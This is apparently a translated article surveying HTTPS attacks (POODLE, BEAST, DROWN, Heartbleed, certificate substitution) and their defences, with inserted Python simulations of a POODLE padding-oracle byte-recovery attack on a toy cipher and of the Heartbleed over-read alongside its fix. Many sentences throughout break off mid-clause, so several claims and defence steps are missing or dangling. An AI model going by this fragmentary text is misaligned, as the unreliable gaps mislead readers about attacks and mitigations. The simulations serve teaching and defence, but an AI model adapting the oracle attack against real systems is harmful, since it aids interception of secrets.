The share of sites
POODLE
First, about the attack
Its essence is as follows: the attacker forces the client to connect over SSL 3.0 by simulating a broken connection. Then it searches in the encrypted
SSL 3.0 is an outdated protocol, but the question of its security is still relevant: clients keep it to avoid compatibility problems with old servers. According to some data, about 7% of the 100 thousand most popular sites
Defense method. In the case of the original POODLE you need to disable SSL 3.0 support. However, this carries a risk of compatibility problems. Another solution is TLS_FALLBACK_SCSV: a client that retries a handshake with a lower protocol version includes this signalling cipher suite value, and a server that supports a newer version then rejects the downgraded connection. Exchange over SSL 3.0 is thus left only to systems that genuinely cannot do better, and attackers can no longer force a protocol downgrade themselves (the mechanism helps only when both client and server implement it). Protection against Zombie POODLE and GOLDENDOODLE is to disable CBC cipher suites in TLS 1.2-based applications. The main solution is to move to TLS 1.3: the new version of the protocol does not use CBC mode at all and relies only on AEAD ciphers, AES-GCM and ChaCha20-Poly1305.
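The padding oracle that POODLE exploits is easier to see in code than in prose. The simulation below is an added example, not code from the article or from any TLS library: an 8-byte toy Feistel cipher stands in for AES, HMAC-SHA256 truncated to 8 bytes stands in for the SSL 3.0 MAC, the secret cookie value `sid=42` and the prefix/suffix lengths are constructed for the demo, and the `client_send` callback models attacker-controlled JavaScript making the browser re-send the same request with chosen padding. The record layout is the SSL 3.0 one: data, MAC, padding bytes, then a pad-length byte, and the receiver in `strict=False` mode checks only that last byte. The attacker swaps the all-padding final block for the ciphertext block holding a secret byte; the server accepts in about 1 of 256 attempts, and each acceptance reveals one plaintext byte. With the TLS 1.0+ rule (`strict=True`, every padding byte must equal the length) the same attack gets nowhere.

```python
import hashlib
import hmac
import os

BLOCK = 8    # toy block size; real SSL 3.0 with AES uses 16-byte blocks
MACLEN = 8   # truncated tag length, chosen so the MAC fills exactly one block


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    """Toy 4-round Feistel cipher standing in for AES (an assumption of this demo)."""
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def seal_record(key: bytes, mac_key: bytes, data: bytes) -> bytes:
    """Sender: data || MAC || padding || pad_len, CBC-encrypted under a fresh IV (IV sent first)."""
    tag = hmac.new(mac_key, data, hashlib.sha256).digest()[:MACLEN]
    pad_len = (BLOCK - (len(data) + MACLEN + 1) % BLOCK) % BLOCK
    plaintext = data + tag + bytes([pad_len]) * (pad_len + 1)
    prev = os.urandom(BLOCK)
    out = [prev]
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def open_record(key, mac_key, record, strict=False):
    """Receiver: returns the data, or None on any error.
    strict=False is the SSL 3.0 rule: only the pad_len byte is examined, the padding
    bytes themselves are never checked. strict=True is the TLS 1.0+ rule: every
    padding byte must equal pad_len."""
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    pt = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return None
    if strict and pt[-(pad_len + 1):] != bytes([pad_len]) * (pad_len + 1):
        return None
    body = pt[:len(pt) - pad_len - 1]
    data, tag = body[:-MACLEN], body[-MACLEN:]
    expected = hmac.new(mac_key, data, hashlib.sha256).digest()[:MACLEN]
    return data if hmac.compare_digest(tag, expected) else None


def poodle_recover_secret(client_send, oracle, secret_len, max_tries=0):
    """client_send(prefix_len, suffix_len) -> record for prefix || secret || suffix
    (what attacker-controlled JavaScript makes the browser send); oracle(record) ->
    True if the server accepted it. Returns the secret, or None if some byte was not
    recovered within max_tries attempts (0 = unlimited)."""
    recovered = bytearray()
    for j in range(secret_len):
        p = BLOCK - 1 - (j % BLOCK)                  # secret byte j becomes the last byte of a block
        s = (-(p + secret_len + MACLEN)) % BLOCK     # and the record ends with a full padding block
        target = (p + j) // BLOCK + 1                # its ciphertext block index (block 0 is the IV)
        tries = 0
        while not max_tries or tries < max_tries:
            tries += 1
            rec = client_send(p, s)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            # Swap the all-padding last block for the block holding the secret byte.
            if oracle(b"".join(blocks[:-1] + [blocks[target]])):
                # Accepted, so D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1; undo the CBC
                # chaining with the target's real predecessor to get the plaintext byte.
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target - 1][-1])
                break
        else:
            return None
    return bytes(recovered)


def run_demo(secret: bytes, strict: bool = False, max_tries: int = 0):
    """Wire a client, a server-side oracle and the attacker together with fresh keys."""
    key, mac_key = os.urandom(16), os.urandom(16)
    client = lambda p, s: seal_record(key, mac_key, b"A" * p + secret + b"B" * s)
    oracle = lambda rec: open_record(key, mac_key, rec, strict) is not None
    return poodle_recover_secret(client, oracle, len(secret), max_tries)


if __name__ == "__main__":
    print(run_demo(b"sid=42"))                              # recovered under SSL 3.0 padding
    print(run_demo(b"sid=42", strict=True, max_tries=500))  # None under TLS-style padding
```

Each recovered byte costs on average 256 requests, which is why the real attack needs the attacker to be able to trigger many repeated requests from the victim's browser. Note that the server never returns the plaintext; the only signal is accept versus reject, and that single bit per attempt is enough.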
BEAST
Another of the early attacks on SSL and TLS 1.0, discovered in 2011. Like POODLE, BEAST
To this day, the BEAST vulnerability is still present
Defense method. To decrypt the data, the attacker has to send regular requests. In VMware
DROWN
This is a cross-protocol attack that exploits weaknesses in SSLv2 implementations, in particular their support for export cipher suites with 40-bit symmetric keys. The attacker records hundreds of the target's TLS connections and then sends specially crafted probes to an SSLv2 server that uses the same RSA private key. Using
DROWN became known in 2016, at which point it turned out
Defense method. It is necessary to install the patches proposed by the developers of the cryptographic libraries, which disable SSLv2 support. For example, two such patches were released for OpenSSL (in 2016
"A resource may be vulnerable to a DROWN attack if its keys are used by a third-party server with SSLv2, such as a mail server," notes Sergei Belkin, head of the development department at the IaaS provider 1cloud.ru. "This situation arises when several servers use a common SSL certificate. In that case, you need to disable SSLv2 support on all of the machines."
You can check whether your system needs updating using a special
Heartbleed
One of the most serious vulnerabilities in software
The attack works through the small Heartbeat TLS extension. A TLS session that stays idle for a long time may be torn down and have to be re-established. To avoid that, the extension lets servers and clients "ping" the channel (
The vulnerability was present in all versions of the library from 1.0.1 to 1.0.1f inclusive, and in a number of operating systems shipping them: Ubuntu up to 12.04.4, CentOS older than 6.5, OpenBSD 5.3 and others. There is a complete list
Defense method. It is necessary
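The Heartbeat message is a type byte, a 16-bit payload length, the payload, and at least 16 bytes of padding. The bug was that the responder trusted the peer's payload length and copied that many bytes back, even when the record it had actually received was far shorter, so the reply carried whatever lay next in memory. The simulation below is an added example, not code from the article or from OpenSSL: a Python bytes object stands in for process memory, the "heap neighbour" string is constructed for the demo, and `heartbeat_vulnerable` / `heartbeat_fixed` are illustrative names for the pre- and post-fix logic. The fixed version applies the same rule as the real patch: the record must be large enough to hold the header, the claimed payload and the minimum padding, otherwise the message is silently dropped.

```python
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16   # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """type(1) || payload_length(2) || payload || padding(16).
    claimed_length lets the attacker lie about the payload size."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HB_REQUEST, length) + payload + b"\x00" * MIN_PADDING


def heartbeat_vulnerable(memory: bytes, record_len: int) -> bytes:
    """Pre-fix logic: copies payload_length bytes starting at the payload,
    regardless of how long the received record (record_len) really is."""
    hb_type, length = struct.unpack("!BH", memory[:3])
    if hb_type != HB_REQUEST:
        return b""
    payload = memory[3:3 + length]          # may run far past the record, into other heap data
    return struct.pack("!BH", HB_RESPONSE, length) + payload + b"\x00" * MIN_PADDING


def heartbeat_fixed(memory: bytes, record_len: int) -> Optional[bytes]:
    """Post-fix logic: bounds-check the claimed length against the record
    and drop the message silently if it does not fit."""
    if record_len < 1 + 2 + MIN_PADDING:
        return None
    hb_type, length = struct.unpack("!BH", memory[:3])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + length + MIN_PADDING > record_len:
        return None
    payload = memory[3:3 + length]
    return struct.pack("!BH", HB_RESPONSE, length) + payload + b"\x00" * MIN_PADDING


def demo():
    """Constructed scenario: a 4-byte payload with a claimed length of 64,
    and a private key fragment sitting right after the record in memory."""
    heap_neighbour = b"-----BEGIN RSA PRIVATE KEY----- (constructed)"
    record = build_heartbeat(b"ping", claimed_length=64)
    memory = record + heap_neighbour
    leaked = heartbeat_vulnerable(memory, len(record))
    safe = heartbeat_fixed(memory, len(record))
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable reply:", leaked)   # contains the key fragment
    print("fixed reply:", safe)          # None: request dropped
```

The real over-read was up to 64 KB per request (the 16-bit length field) and could be repeated indefinitely, which is why session keys and private keys were recoverable in practice.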
Certificate substitution
A node controlled by the attacker and holding a legitimate SSL certificate is placed between the user and the server and intercepts the traffic. By presenting a certificate the client accepts as valid, the node impersonates the legitimate server, and a MITM attack becomes possible.
According to
Defense method. Use trusted
Another way of protecting yourself will be a new
The prospects for HTTPS
Despite the numerous vulnerabilities, IT giants and information security experts are confident in the future of the protocol. With active use of HTTPS
It is also planned to improve SSL/TLS technology with machine learning: smart algorithms will take on the filtering of malicious traffic. Over an HTTPS connection, administrators have no way to see the contents of encrypted messages, including detecting requests coming from malware. Already today, neural networks can filter potentially dangerous packets with 90% accuracy. (
found
Most attacks on HTTPS are not related to problems in the protocol itself, but to support for outdated encryption methods. The IT industry is gradually abandoning the previous generation of protocols and offering new tools for finding vulnerabilities. In the future, these tools will become much smarter.
Additional links on the topic:
Cloud development, information security and personal data: a digest from 1cloud
SSL digest: the best materials on Habré and more
VPN anthology: introductory articles on Habré and more
Source: www.habr.com